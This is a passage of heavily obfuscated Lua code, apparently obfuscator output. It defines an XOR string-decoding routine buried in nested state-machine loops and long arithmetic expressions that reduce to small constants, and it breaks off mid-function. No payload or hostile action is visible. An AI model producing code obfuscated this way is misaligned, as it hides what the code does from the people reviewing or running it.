

local v0 = bit32 or bit;
local v1 = v0.bxor;
local v2 = v0.bor;
local v3 = v0.band;
local v4 = string.char;
local v5 = string.byte;
local v6 = string.sub;
local v7 = bit32 or bit;
local v8 = v7.bxor;
local v9 = table.concat;
local v10 = table.insert;
local function v11(v16, v17)
	local v19 = 0;
	local v20;
	local v21;
	local v22;
	local v23;
	local v24;
	local v25;
	local v26;
	local v27;
	while true do
		if (v19 == 4) then
			while true do
				if (((589 + 46) - (7 + 626)) == v20) then
					v25 = nil;
					v26 = nil;
					v20 = 4 - 1;
				end
				if (v20 == ((1560 - (1167 + 393)) - (0 - 0))) then
					local v36 = 0 - (983 - (580 + 403));
					while true do
						if (v36 == (1 - 0)) then
							v20 = 1;
							break;
						end
						if (v36 == (0 + 0 + (702 - (46 + 656)))) then
							v21 = (0 - 0) - (0 - 0);
							v22 = nil;
							v36 = (3 + 0) - (64 - (21 + 41));
						end
					end
				end
				if (1 == v20) then
					v23 = nil;
					v24 = nil;
					v20 = 1001 - (464 + (728 - 193));
				end
				if (v20 == 3) then
					v27 = nil;
					while true do
						if (v21 == (0 + 0)) then
							local v38 = 0;
							local v39;
							while true do
								if (v38 == (0 + 0 + (0 - 0))) then
									v39 = 0;
									while true do
										if (v39 == 0) then
											v22 = (0 + 0) - 0;
											v23 = nil;
											v39 = (382 - (25 + 356)) + 0;
										end
										if (v39 == (1 + 0)) then
											v21 = (2 + 2) - 3;
											break;
										end
									end
									break;
								end
							end
						end
						if (((1481 - (189 + 1288)) - (1273 - (832 + 440))) == v21) then
							while true do
								if (v22 == (1005 - ((1209 - (269 + (1201 - 590))) + (1200 - (424 + (2087 - (1436 + 549))))))) then
									v27 = nil;
									while true do
										if (v23 == ((64 - (4 + (1191 - (806 + 370)) + (20 - 13) + (50 - 17))) - (((2425 - (747 + 441)) - ((1598 - (438 + 722)) + 793)) - 3))) then
											while true do
												if (v24 == ((((1180 + 1179) - (85 + 39 + 130)) - ((1559 - (18 + 76)) - (23 + (1311 - (1160 + 105)) + (907 - (270 + 473)) + 182))) - (((312 + 458) - (2049 - (1499 + 34))) + 800))) then
													v27 = nil;
													while true do
														if (v25 == ((1 + 1) - (((1520 - 1143) - (((108 + 155) - 144) + ((1444 - (8 + 71)) - ((2414 - (708 + 1242)) + (2482 - 1838))))) + (0 - (0 + (0 - 0)))))) then
															while true do
																local v79 = 0 + 0 + (512 - (478 + 34));
																local v80;
																local v81;
																local v82;
																while true do
																	if (v79 == (2 - 1)) then
																		v82 = nil;
																		while true do
																			if (v80 == 1) then
																				while true do
																					if (v81 == (((2721 - (1217 + 481)) - (1006 + 4 + 13)) + 0 + ((0 + 0) - ((0 - 0) + (0 - 0))))) then
																						v82 = (((1934 - (825 + 831)) - 127) - (56 + 30 + (102 - (34 + 3)))) + ((180 - (223 - 135)) - (((3674 - 2018) - (619 + 224 + 741)) + (518 - (21 + 477))));
																						while true do
																							if (v82 == (((((3490 + 6238) - 6666) - (337 + 491 + 118 + 289)) - ((858 - (695 + 129)) + 201 + 1102 + (1108 - ((648 - 512) + (1601 - (967 + 330)) + ((55 + 337) - 214))))) - ((((181 - 54) + (1491 - (43 + 6)) + 290 + 251) - ((1743 - (405 + 482 + 21 + 371)) + (((2395 - (517 + 39)) - (2416 - 1577)) - (20 + 94)))) - (672 + (163 - ((850 - (158 + 688)) + 50 + 5 + (1453 - (52 + 1336)))) + (155 - 106))))) then
																								if ((v26 == (((471 + 1163) - ((1155 - (147 + 457)) + 1082)) + (0 - (0 - 0)))) or (((145 + 39 + ((17306 + 86 + 769 + ((2948 - (171 + 771)) - (595 + 387 + 74))) - (((17516 - 5006) - (95 + 9 + 1115)) + 1764))) - (((1454 + 1520) - ((3036 - (2399 - (64 + 457))) + (2125 - 1380))) + 12 + 0 + ((6049 - (8078 - 3885)) - (1691 - (((2461 - ((1367 - 843) + (3652 - 2701))) - (2133 - (1253 + 311))) + (((512 - (140 + 245)) + 105) - (1841 - (1287 + 442)))))))) == (((16343 - ((1119 - 527) + (813 - (22 + 435)))) - (5834 + (6640 - (117 + 110)))) - (((1168 + (1074 - (637 + 24))) - (((402 + 1945) - (869 + 360 + 144)) + 407 + (847 - 652))) + ((1621 - (1275 + 341)) - 2) + ((((680 + 227) - (197 + (168 - 65))) - (39 + (686 - (29 + 632)) + ((1174 - (61 + 495)) - (((816 + 398) - (63 + 167 + 928)) + 295)))) - ((((2697 - (609 + 1195)) + (3225 - 1776)) - (3476 - (499 + (4433 - 3248)))) - (968 - (1434 - (592 + 208))))))))) then
																									return v9(v27);
																								end
																								if (v26 ~= ((803 - ((2521 - 1756) + (131 - 93))) + 0 + 0)) then
																								else
																									local v111 = 0;
																									local v112;
																									local v113;
																									local v114;
																									local v115;
																									local v116;
																									while true do
																										if (v111 == 2) then
																											v116 = nil;
																											while true do
																												if (v112 == 2) then
																													while true do
																														if (v113 == (0 - 0)) then
																															local v131 = (591 - (58 + 8)) - (317 + 208);
																															local v132;
																															while true do
																																if (v131 == 0) then
																																	v132 = 0;
																																	while true do
																																		if (((732 + 8) - ((1390 - (4 + 1214)) + 567)) == v132) then
																																			v113 = 645 - (65 + 579);
																																			break;
																																		end
																																		if (v132 == 0) then
																																			v114 = ((0 - 0) + 0) - ((0 - 0) - (1364 - (260 + 1104)));
																																			v115 = nil;
																																			v132 = 1;
																																		end
																																	end
																																	break;
																																end
																															end
																														end
																														if (v113 == (1189 - (34 + 1154))) then
																															v116 = nil;
																															while true do
																																if ((((5704 - 3728) - (1297 + 679)) + 0) == v114) then
																																	local v135 = (3430 - (34 + 1722)) - (473 + 1201);
																																	while true do
																																		if (v135 == 0) then
																																			local v138 = 0;
																																			local v139;
																																			while true do
																																				if (v138 == 0) then
																																					v139 = 0 - (1327 - (746 + 581));
																																					while true do
																																						if (v139 == (1591 - (1056 + 534))) then
																																							v135 = 3 - 2;
																																							break;
																																						end
																																						if (v139 == 0) then
																																							v115 = 0 + 0;
																																							v116 = nil;
																																							v139 = 1503 - (393 + (2472 - 1363));
																																						end
																																					end
																																					break;
																																				end
																																			end
																																		end
																																		if (v135 == (1758 - (1284 + 473))) then
																																			v114 = 3 - (6 - 4);
																																			break;
																																		end
																																	end
																																end
																																if (v114 == ((581 + (211 - 148)) - (70 + 229 + 127 + 151 + 66))) then
																																	while true do
																																		if (v115 == ((0 + 0) - 0)) then
																																			v116 = (((2804 - (63 + 1556)) + (1775 - (329 + 848))) - (1523 + 260)) - 0;
																																			while true do
																																				if (v116 == ((603 - (361 + 241)) + (0 - 0) + ((0 - 0) - (0 + 0)) + 0)) then
																																					v26 = 3 - 2;
																																					break;
																																				end
																																				if (v116 == ((0 + 0 + 0 + (1051 - (852 + 115 + (113 - (18 + 11))))) - (0 + 0))) then
																																					local v142 = 0 - (0 - 0);
																																					local v143;
																																					local v144;
																																					local v145;
																																					while true do
																																						if (v142 == (2 - 1)) then
																																							v145 = nil;
																																							while true do
																																								if (v143 == ((0 - 0) - (0 - 0))) then
																																									local v151 = 0 + 0;
																																									local v152;
																																									while true do
																																										if (v151 == (392 - ((612 - 225) + 5))) then
																																											v152 = 0 - 0;
																																											while true do
																																												if ((0 + 0) == v152) then
																																													local v155 = 0 + (747 - (19 + 728));
																																													while true do
																																														if (v155 == 1) then
																																															v152 = 1 + 0 + 0;
																																															break;
																																														end
																																														if (v155 == 0) then
																																															v144 = (0 + 0 + 0) - ((0 - 0) - 0);
																																															v145 = nil;
																																															v155 = 1 + (1521 - (1278 + 243));
																																														end
																																													end
																																												end
																																												if (v152 == (2 - 1)) then
																																													v143 = 1 - (0 + 0);
																																													break;
																																												end
																																											end
																																											break;
																																										end
																																									end
																																								end
																																								if (v143 == (294 - (((897 - 378) - (286 + 55)) + 31 + 84))) then
																																									while true do
																																										if (v144 == (1146 - (390 + 756))) then
																																											v145 = (0 + 0) - (0 + ((1172 - (496 + 676)) - 0));
																																											while true do
																																												if (v145 == ((1958 - (750 + 1207)) + 0 + (1131 - (215 + 279 + 637)))) then
																																													v116 = (((718 - (185 + 132)) - 219) + 61) - ((((19577 - 12861) - 4688) - ((2831 - (174 + 1537)) + (1160 - (1142 - (1068 - 510))) + ((656 - 313) - (568 - 298)) + 39)) + ((((16867 - (11 + 81)) - (4532 + 5754 + 2809)) - ((((1662 - (1314 + 238)) + 173) - (36 + 150 + ((1415 - (72 + 1119)) - (2159 - (1853 + 127))))) + (((1991 + 1295) - (235 + 416)) - ((1983 - 1432) + 265 + 11)))) - (((1115 + (1203 - (356 + 500))) - ((536 - (94 + 392)) + (33 - 19) + (623 - (104 + 414)))) + (((2981 - (798 + 135)) - (5206 - 3956)) - (((630 - ((2068 - (739 + 1125)) + 66)) - 237) + 42 + 8 + (470 - 350))))));
																																													break;
																																												end
																																												if (v145 == ((((1929 - (1075 + 854)) - (1332 - (717 + 615))) + ((0 + 0) - (0 - 0))) - (((3271 - (899 + 193)) - (2297 - 1205)) - (12 + 386 + 689)))) then
																																													local v156 = 0 + 0;
																																													local v157;
																																													local v158;
																																													local v159;
																																													while true do
																																														if (1 == v156) then
																																															v159 = nil;
																																															while true do
																																																if (v157 == 1) then
																																																	while true do
																																																		if (v158 == ((837 - (434 + 403)) + (104 - (41 + 14 + (157 - 108))))) then
																																																			v159 = ((3315 - (737 + 598)) - ((1620 - (194 + 106 + 1289)) + (2756 - (406 + 1279)))) - (321 + 71 + 376 + 110);
																																																			while true do
																																																				if (v159 == (0 + 0)) then
																																																					local v163 = 0;
																																																					local v164;
																																																					while true do
																																																						if (v163 == (521 - (189 + 332))) then
																																																							v164 = (0 - 0) + (1458 - ((1504 - (18 + 660)) + (927 - 295)));
																																																							while true do
																																																								if (v164 == (1 + ((1545 - (739 + 806)) - 0))) then
																																																									v159 = ((1 - 0) + 0) - (96 - (64 + 32));
																																																									break;
																																																								end
																																																								if (((0 - 0) - (0 - 0)) == v164) then
																																																									local v165 = 0;
																																																									while true do
																																																										if ((0 + 0 + 0) == v165) then
																																																											local v166 = 0 - 0;
																																																											while true do
																																																												if (v166 == ((3134 - 1172) - (633 + 15 + 1313))) then
																																																													v165 = (1 - 0) - 0;
																																																													break;
																																																												end
																																																												if (v166 == (0 - 0)) then
																																																													v27 = {};
																																																													for v167 = (954 + (1934 - (1361 + 94)) + ((283 + 341) - 360)) - (((((6368 - (883 + 855)) - (6465 - 4105)) - (835 + 146 + 547)) - (((252 - (126 + 119)) - (1651 - (1280 + 369))) + (54 - 28) + 22 + 1)) + (2664 - (2310 - 654))), #v16 do
																																																														v10(v27, v4(v8(v5(v6(v16, v167, v3(v167, (((7762 - (97 + 713 + 4990)) - (((5384 - 4239) - 854) + 489 + 81)) - (((2284 - (947 + 858)) - 359) + (747 - (14 + 518)) + ((5763 - (3317 - (154 + 26))) - (2560 - (67 + 111 + 323 + 132))) + (524 - ((974 - (75 + 825)) + 384)))) + (((3104 - 1905) + 709) - (((929 + 668) - ((28 - 16) + (3 - 2))) + ((1980 - 1183) - (280 + 39 + 154)))) + ((1448 - ((1564 - (184 + 372)) + 265 + 175)) - 0)) + v2(v167, ((1734 - (545 + 1184)) + 0 + (21 - 6) + ((((5952 - (527 + 831)) - (2849 - (1189 + 710))) - ((5373 - 3940) + (576 - (735 - 400)))) - ((961 - (320 + 71)) + ((1102 - (324 + 10)) - (602 - (49 + 18))) + 66 + 57))) - (((149 + 0 + ((3537 - 1496) - (1718 + 214)) + (1949 - (1114 + (659 - 517) + (800 - (337 + 405))))) - (779 - (((6797 - 2609) - (3536 - (50 + 789))) - (199 + (2218 - (1891 + 16)) + (1160 - (115 + 495)))))) + ((169 + 930) - (145 + (1762 - (646 + 192)))) + (((766 + 688 + 1054) - (((1396 - (20 + 278)) - (24 + 61 + 11)) + (1239 - (164 + (596 - 329))))) - (((1900 - 1046) + 1004) - (3680 - (2431 - (42 + 23))))) + (407 - 244) + ((((10751 - 7642) - 2052) - ((823 - (192 + 421)) + 567)) - ((46 + 445) - ((314 + 675 + 223) - (2484 - 1654)))))))), v5(v6(v17, v3(((((1 - 0) + ((2888 - 1735) - (183 + 970)) + (1976 - (333 + 1641)) + (0 - (0 + 0))) - (1 + 1)) - (((2131 - 588) - ((1623 - (337 + 86 + 185)) + 161 + 168 + 51)) - (((589 - 381) - 162) + ((3636 - 2641) - ((129 - (38 + 6)) + 330 + 478))))) - (((368 - ((44 + 193) - (77 - 29))) - (1082 - (770 + 188))) - (((((7820 - (422 + 392)) - (341 + 791)) - 3916) - ((1413 - (2 + 3 + (30 - 16) + 3)) + (1438 - 1070) + (762 - 607))) + (933 - (588 + 334)))), (v167 - ((((2872 - ((902 - 622) + 1492)) + (2409 - (1207 + 702))) - ((2466 - (2790 - (1371 + 261))) + 163 + (288 - 160))) + ((2485 - (331 + 160)) - ((2002 - (749 + 3)) + ((27 + 953 + 1731) - ((856 - (1062 - (595 + 59))) + 808 + (2944 - 2233))))) + ((2097 - (3298 - 2301)) - (984 + (1648 - (((2861 - (941 + 568)) - 891) + 1071)))) + (0 - (0 + 0)) + ((((5144 - 3956) - (40 + 714 + (971 - (189 + 472)) + 124)) - ((0 - 0) - (551 - (190 + 361)))) - (0 + (0 - 0))))) % #v17) + v2((((((3954 - ((604 - (453 + 12)) + (2641 - 1599))) + 361) - (((139 + 72 + 158) - (((2525 - (523 + 241)) - (1428 + 198)) + (125 - 53))) + 29 + 127 + 55)) - (((1117 - 192) - (161 + (788 - 496))) + 1131)) - (((1585 + 1642 + (11707 - 9086)) - ((906 + 5054) - ((1938 - 802) + (1564 - (529 + 754))))) - ((1994 - (1027 + 60)) - ((217 + 440) - (723 - 357))))) - ((((964 + 698) - (((130 + 924) - 300) + 311 + (1255 - (804 + 436)))) - (227 + 73)) + (((((3704 - (8 + 19)) - ((379 - 207) + 3 + 81)) - (919 + ((2284 - (98 + 734)) - (304 + 815)))) - ((((957 + 194 + (11848 - 5507)) - (337 + 4094)) - 2031) + ((3187 - (1833 + 141)) - (((9361 - (928 + 401)) - 5860) - (3197 - (809 + 998)))))) - (((112 + 22) - (15 + 28)) + (921 - 582) + 63 + 29))), (v167 - (((26 - 17) - 6) - (((1204 - (207 + 996)) - 0) + ((768 - (100 + 667)) - 0)))) % #v17), v3(v3(((640 + 101 + 3482) - (486 + 968 + (2417 - (2599 - (925 + 160))))) - ((2735 - 1698) + (1217 - 721) + ((1261 - (2026 - 1236)) - ((2336 - (1537 + 254)) - (((1464 - 903) - (293 + 197)) + 3 + 22 + 120 + 85))) + ((297 - 188) - 51) + (128 - 81)), (v167 - (((1494 - (699 + 794)) - (0 + 0)) + 0 + ((2334 - (1009 + 662)) - (470 + 78 + (1295 - (1081 + 99)))))) % #v17) + v2(1, (v167 - ((((23 - 17) - (1 + 3)) - ((568 - (109 + (1523 - 1065))) + 0)) - ((((0 - 0) + 0) - (((0 - 0) - (0 - 0)) - (0 - 0))) - ((((4615 + 1737) - 5070) - (((17291 - 12835) - 3331) + ((464 - 340) - 88) + ((2125 - (144 + 506)) - (847 + (1015 - (266 + 242)))))) + (0 - 0) + 0 + 0)))) % #v17), (((1 + 0 + 1) - (1 + (1408 - (341 + 1067)))) + ((1609 - (936 + 411)) - ((495 - 252) + (53 - 34))) + (527 - (124 + 366))) - (((((1094 + (3121 - (250 + (2483 - 1850)))) - (((9150 - 6093) - (7532 - 5756)) + 61)) - (((3416 - (4949 - 3375)) - (4670 - (5122 - (1697 + 22)))) + ((109 + (4673 - 3362) + ((1794 - (346 + 1419)) - 15)) - ((270 - 179) + (916 - 363))))) - (((1836 + (107 - 80)) - (169 + (1376 - 1077) + ((953 + 73) - (799 - 222)) + 928)) + (1894 - (((3589 - 2365) - ((2517 - 1829) + ((1626 - (54 + 103)) - (627 + 499)))) + 212 + (2441 - 1536))))) + (((224 + 798 + (900 - (55 + 600))) - (((252 + 1496) - ((1464 - (146 + 394)) + (1198 - 745))) + ((2321 - ((1721 - (151 + 952)) + (2540 - 1610))) - ((1200 - (47 + 400)) - (101 + 22 + (545 - (280 + 140))))))) - ((((1844 - (((1626 - 520) - (2367 - (1125 + 810))) + 803 + 182)) + ((533 + 920) - (287 + 159 + 373 + 6))) - (315 + 53)) + ((355 - (1 + 5 + (337 - 196))) - 39))))) + v2(v3(1467 - (769 + 199 + 72 + 426), (v167 - (((((1369 - 970) + 966) - (98 + ((4306 - (922 + 416)) - (167 + 1536)))) - (1 + (735 - (102 + 219 + 414)))) + 0 + 0)) % #v17) + v2((((4 + (1492 - (1287 + 202))) - (3 + 0)) - (((1354 - (273 + 28)) - (945 + 106)) + 1)) + ((((42 + 33 + 241) - ((1014 - (560 + 149)) + ((1079 - 513) - (432 + 123)))) - (0 + 0)) - (((0 + 0) - 0) + ((1881 - (1291 + 590)) - 0))) + ((1754 - ((435 - 103) + 1239 + (824 - (121 + 638)) + (870 - (599 + 153)))) - ((0 - 0) + 0)), (v167 - (((((2751 - (1220 + 48)) + 507) - (17 + (((1019 - (218 + 387)) + 369 + ((317 + 1354) - (2274 - 1253))) - (((501 + 258) - (1014 - (549 + 18))) + 501 + 373)))) - (((541 - 294) - (((3023 - 1011) - (1913 + (63 - 47))) + ((276 + 15) - (12 + (588 - (75 + 416)) + ((253 + 17) - 138))))) + (3288 - (1691 - (12 + 1))))) - ((499 - ((1069 - (823 - (190 + 33))) + ((1551 - (1137 + 214)) - (34 + 114 + 43)) + (812 - ((897 - 485) + 374 + 7)))) - (((1494 + 180) - ((1418 - (184 + 742)) + ((1225 - (238 + 466)) - ((583 - (31 + 384)) + (804 - 597))))) - (((739 - (147 + 439)) - (1322 - (386 + 869))) + (((891 - (5 + 123)) - 153) - ((476 - 375) + ((35 + 33) - (1 + 48)))) + ((346 + 1060) - (1270 - 323))))))) % #v17), (((702 - (48 + 502)) - (91 + (103 - 44))) - (((4 - 2) + 0) - (1 + 0))) - 0)))) % ((((5811 - (79 + 115)) - ((504 - 320) + 1384)) - ((((2848 + 611) - ((1275 - (442 + 606)) + 760 + 378)) + 1309 + 49) - (((2525 - (562 + 623)) - 959) + (2346 - (681 + (2272 - 1324)))))) - (((572 + 1001) - (((41 + 197) - (50 + (339 - 243))) + 64 + 51 + (1490 - (46 + 177)))) + ((2333 - (((10 + 19) - 12) + ((24 + 68) - (1309 - (432 + 817))))) - (1231 + (108 - 66) + (1100 - ((2430 - 1584) - ((302 - 200) + 98 + 170))))) + (((229 - ((84 - 25) + (1377 - (891 + 370)))) + 1535) - (250 + (137 - 58) + (650 - (176 + 451)) + ((1252 - 782) - ((547 - 401) + 40))))))));
																																																													end
																																																													v166 = (4 - 2) - (1569 - (1168 + 400));
																																																												end
																																																											end
																																																										end
																																																										if (v165 == 1) then
																																																											v164 = 3 - ((10 - 5) - 3);
																																																											break;
																																																										end
																																																									end
																																																								end
																																																							end
																																																							break;
																																																						end
																																																					end
																																																				end
																																																				if (v159 == (((5344 - 3812) - ((4485 - 3557) + 221 + 382)) - (1678 - (670 + 1008)))) then
																																																					v145 = (((3671 - (4211 - 2235)) - (((1132 + 261) - 355) + 654)) - (5 - (2 + 1))) + ((1191 - (2417 - 1587)) - (((4497 - 3152) - (106 + 326 + 582)) + ((67 + 613) - (229 + (18 - 10) + ((2139 - (704 + (3166 - 2519))) - ((3011 - 1355) - (1818 - 537)))))));
																																																					break;
																																																				end
																																																			end
																																																			break;
																																																		end
																																																	end
																																																	break;
																																																end
																																																if (v157 == (818 - (537 + 281))) then
																																																	local v162 = (0 - 0) + (0 - 0);
																																																	while true do
																																																		if (v162 == 0) then
																																																			v158 = (2852 - (437 + (1693 - (171 + 110)))) - ((1438 - 1044) + ((1481 + (1132 - (657 + 166))) - (696 + 109 + 142 + 234)));
																																																			v159 = nil;
																																																			v162 = (1 + 0) - 0;
																																																		end
																																																		if ((1 + (1269 - (13 + 1256))) == v162) then
																																																			v157 = (7 - 5) - (2 - 1);
																																																			break;
																																																		end
																																																	end
																																																end
																																															end
																																															break;
																																														end
																																														if (v156 == 0) then
																																															v157 = 0 + 0;
																																															v158 = nil;
																																															v156 = 1;
																																														end
																																													end
																																												end
																																											end
																																											break;
																																										end
																																									end
																																									break;
																																								end
																																							end
																																							break;
																																						end
																																						if (((0 - 0) - (0 + 0)) == v142) then
																																							local v149 = 0 + 0;
																																							while true do
																																								if (v149 == ((1816 - 881) - (339 + 596))) then
																																									v143 = (1293 - (429 + 864)) + 0 + 0;
																																									v144 = nil;
																																									v149 = 2 - (4 - 3);
																																								end
																																								if (v149 == ((1454 + 13) - (541 + 925))) then
																																									v142 = 1 + 0 + 0;
																																									break;
																																								end
																																							end
																																						end
																																					end
																																				end
																																			end
																																			break;
																																		end
																																	end
																																	break;
																																end
																															end
																															break;
																														end
																													end
																													break;
																												end
																												if (v112 == ((855 - (330 + 524)) + 0)) then
																													v115 = nil;
																													v116 = nil;
																													v112 = 2;
																												end
																												if ((0 + 0) == v112) then
																													local v129 = 0;
																													while true do
																														if (v129 == 1) then
																															v112 = 1;
																															break;
																														end
																														if (v129 == 0) then
																															v113 = 82 - (24 + 7 + 51);
																															v114 = nil;
																															v129 = 1;
																														end
																													end
																												end
																											end
																											break;
																										end
																										if (v111 == (3 - (3 - 1))) then
																											v114 = nil;
																											v115 = nil;
																											v111 = 2;
																										end
																										if (v111 == (0 - (0 - 0))) then
																											v112 = 0 + 0;
																											v113 = nil;
																											v111 = 1 + (0 - 0);
																										end
																									end
																								end
																								break;
																							end
																						end
																						break;
																					end
																				end
																				break;
																			end
																			if (v80 == ((1798 - (392 + 168 + 916)) - (((183 + 554) - (89 + 438 + (215 - 131) + (251 - 177))) + 30 + 105 + (279 - (74 + 96)) + ((1011 - 609) - (166 + (595 - 385)))))) then
																				local v94 = 1160 - ((1843 - (842 + 83)) + 93 + 149);
																				local v95;
																				while true do
																					if (v94 == ((0 - 0) - (0 + 0))) then
																						v95 = (3410 - 2019) - (255 + 696 + 423 + 17);
																						while true do
																							if (v95 == (1 + 0)) then
																								v80 = 1;
																								break;
																							end
																							if (v95 == (0 + 0)) then
																								local v110 = 0;
																								while true do
																									if (v110 == ((0 - 0) + 0)) then
																										v81 = 162 - (((294 - 164) - (62 + 32)) + 29 + 41 + (193 - (71 + 66)));
																										v82 = nil;
																										v110 = 1;
																									end
																									if (v110 == (1 + 0)) then
																										v95 = (533 - (388 + 144)) + 0;
																										break;
																									end
																								end
																							end
																						end
																						break;
																					end
																				end
																			end
																		end
																		break;
																	end
																	if (v79 == 0) then
																		local v90 = (0 - 0) - (469 - (203 + 266));
																		while true do
																			if (v90 == 1) then
																				v79 = (1 - 0) + 0;
																				break;
																			end
																			if (v90 == ((501 - (301 + 200)) + 0 + 0)) then
																				local v96 = 0;
																				while true do
																					if (v96 == 0) then
																						v80 = ((3279 - (282 + 87 + 873)) - (262 + 78 + 302)) - (((2359 - 1008) - (148 + 22 + 11 + 12)) + (1072 - 835));
																						v81 = nil;
																						v96 = 1;
																					end
																					if (v96 == 1) then
																						v90 = 1699 - (130 + 1568);
																						break;
																					end
																				end
																			end
																		end
																	end
																end
															end
															break;
														end
														if (((((0 - 0) - 0) - (((2379 - (793 + 283)) - (90 + 1213)) + 0 + (0 - 0))) + ((621 - 360) - (4 + 217 + 19 + 9 + 11 + 1))) == v25) then
															local v74 = 0 + 0;
															local v75;
															local v76;
															local v77;
															local v78;
															while true do
																if (v74 == ((0 - 0) - (1464 - (1348 + 116)))) then
																	v75 = 0;
																	v76 = nil;
																	v74 = 1366 - ((2029 - (718 + 463)) + 517);
																end
																if (1 == v74) then
																	v77 = nil;
																	v78 = nil;
																	v74 = 2;
																end
																if (v74 == (2 + 0)) then
																	while true do
																		if (v75 == 1) then
																			v78 = nil;
																			while true do
																				if (v76 == (((2404 - (280 + 681)) + 230) - ((1089 - (388 + 58)) + 1030))) then
																					local v101 = 0 + 0 + 0 + 0;
																					local v102;
																					local v103;
																					while true do
																						if (v101 == (1 + 0)) then
																							while true do
																								if (v102 == (0 + 0)) then
																									v103 = 0;
																									while true do
																										if (v103 == 1) then
																											v76 = 1 + 0;
																											break;
																										end
																										if (v103 == ((3924 - 2430) - (1023 + 471))) then
																											local v125 = 0 - 0;
																											while true do
																												if (v125 == 0) then
																													v77 = 0 + (0 - 0);
																													v78 = nil;
																													v125 = 1;
																												end
																												if (v125 == 1) then
																													v103 = (1 + 1) - (3 - 2);
																													break;
																												end
																											end
																										end
																									end
																									break;
																								end
																							end
																							break;
																						end
																						if (0 == v101) then
																							v102 = 0;
																							v103 = nil;
																							v101 = 1 - 0;
																						end
																					end
																				end
																				if (v76 == (1 + (0 - 0))) then
																					while true do
																						if (v77 == ((1982 - ((2767 - (3797 - (1281 + 457))) + ((938 + 2405) - (341 + 1728)))) + (1290 - (169 + 1121)))) then
																							v78 = (((1025 - ((3240 - 979) - ((2148 - 764) + 330))) - ((221 - (63 - 10)) + (223 - 68) + 106 + 49)) + ((406 + (1656 - (1384 + 252))) - ((954 - 553) + 25))) - ((((12614 - 8947) - 2188) - (700 + 779)) + 0 + ((4143 - (1619 + 591)) - (((1814 + 1400) - ((5573 - (1319 + 655)) - 2121)) + ((2242 - (875 + 834)) - (1128 - (776 + 16))))));
																							while true do
																								if (v78 == ((1902 - ((1864 - (112 + 829)) + (2377 - (545 + 1195)) + ((2435 - 1528) - (42 + 118 + 8 + 129 + 181 + 163)))) - (((639 - 320) - ((1944 - (68 + 1673)) + (644 - (263 + 306)))) + (((1461 - (889 + 533)) + 1394 + ((2133 - (409 + 363)) - (832 + 235))) - ((151 - (57 + 1)) + 1599))))) then
																									local v117 = 0;
																									local v118;
																									local v119;
																									while true do
																										if ((2 - (1 - 0)) == v117) then
																											while true do
																												if (v118 == (0 - (0 + 0))) then
																													v119 = (0 - 0) + 0;
																													while true do
																														if (v119 == ((242 + 1106) - (1293 + 54))) then
																															v78 = 1 + 0 + 0;
																															break;
																														end
																														if (v119 == (0 + 0)) then
																															local v133 = (978 - (447 + 531)) - 0;
																															local v134;
																															while true do
																																if (((0 - 0) - 0) == v133) then
																																	v134 = 0;
																																	while true do
																																		if (v134 == (1837 - ((1922 - 1472) + 1387))) then
																																			local v140 = 0 - 0;
																																			local v141;
																																			while true do
																																				if (v140 == 0) then
																																					v141 = 423 - (30 + 212 + 181);
																																					while true do
																																						if (v141 == (1 + 0 + 0)) then
																																							v134 = 1910 - (1665 + 244);
																																							break;
																																						end
																																						if (v141 == (0 + 0)) then
																																							local v150 = 0;
																																							while true do
																																								if (v150 == (399 - (181 + 218))) then
																																									v26 = 0 + (370 - (137 + 233)) + ((934 - (756 + 178)) - 0);
																																									v27 = nil;
																																									v150 = 1;
																																								end
																																								if (v150 == (2 - 1)) then
																																									v141 = (4 - 3) + 0;
																																									break;
																																								end
																																							end
																																						end
																																					end
																																					break;
																																				end
																																			end
																																		end
																																		if (v134 == (1811 - (93 + 19 + 155 + 1543))) then
																																			v119 = ((4 - 2) - (1 + 0)) - ((0 - 0) + 0 + 0 + 0);
																																			break;
																																		end
																																	end
																																	break;
																																end
																															end
																														end
																													end
																													break;
																												end
																											end
																											break;
																										end
																										if (v117 == (0 - 0)) then
																											v118 = 0 + 0;
																											v119 = nil;
																											v117 = 1 + (0 - 0);
																										end
																									end
																								end
																								if (v78 == ((2 - 1) + 0 + 0 + 0 + ((((5633 - (370 + 1492)) - 2818) - ((2195 - (1300 + 473)) + ((229 + 2071) - ((593 - 339) + 1515)))) - ((282 - ((1204 - (490 + 457)) + 10 + 15)) + (0 - 0))))) then
																									v25 = ((2589 - (33 + 864)) - ((3436 - ((264 - 152) + 1102 + 585)) + 54)) + (((2258 + 1228) - ((529 - ((645 - 422) + 28)) + 285 + 1164)) - (((9052 - (7971 - (756 + 198))) - (41 + 307)) + (85 - (93 - 64)) + 16));
																									break;
																								end
																							end
																							break;
																						end
																					end
																					break;
																				end
																			end
																			break;
																		end
																		if (v75 == 0) then
																			local v93 = 0 - 0;
																			while true do
																				if (v93 == (0 - 0)) then
																					v76 = (0 - 0) - (1020 - (370 + (143 - 56) + (1565 - (600 + 816)) + (1179 - 765)));
																					v77 = nil;
																					v93 = 1 - (1215 - (767 + 448));
																				end
																				if ((1 + 0) == v93) then
																					v75 = 1 + 0 + 0;
																					break;
																				end
																			end
																		end
																	end
																	break;
																end
															end
														end
													end
													break;
												end
												if (0 == v24) then
													local v62 = 0;
													local v63;
													local v64;
													local v65;
													while true do
														if (v62 == 1) then
															v65 = nil;
															while true do
																if (v63 == 1) then
																	while true do
																		if (v64 == (0 - (0 + 0 + (0 - 0)))) then
																			v65 = 0 + 0 + 0 + 0;
																			while true do
																				if (v65 == (0 + 0)) then
																					local v104 = 0;
																					local v105;
																					local v106;
																					while true do
																						if (v104 == 0) then
																							v105 = 0 + 0;
																							v106 = nil;
																							v104 = 1;
																						end
																						if (v104 == 1) then
																							while true do
																								if (v105 == ((0 - 0) - (1281 - (662 + 619)))) then
																									v106 = 0 + ((48 + (3110 - 2475)) - ((732 - ((239 - 74) + (737 - 538))) + 110 + 188 + 17));
																									while true do
																										if (v106 == (((111 + 1357) - ((1371 - (245 + 937)) + (1753 - (317 + 158)))) + ((0 + 0) - (0 + 0)) + 0)) then
																											v65 = (1237 - (1155 + 81)) - (0 - 0);
																											break;
																										end
																										if (((855 - ((1262 - (236 + 189)) + 18)) + (1694 - (927 + (2674 - (951 + 956))))) == v106) then
																											local v126 = (0 - 0) - 0;
																											while true do
																												if (v126 == (0 - (0 - 0))) then
																													v25 = ((1246 - (2443 - 1719)) + 1326) - ((2039 - (280 + 955)) + ((12137 - 9492) - (71 + 329 + 1201)));
																													v26 = nil;
																													v126 = 1 + 0;
																												end
																												if (v126 == (1 + 0)) then
																													v106 = (1213 - (713 + (1020 - 522))) - (1 + 0);
																													break;
																												end
																											end
																										end
																									end
																									break;
																								end
																							end
																							break;
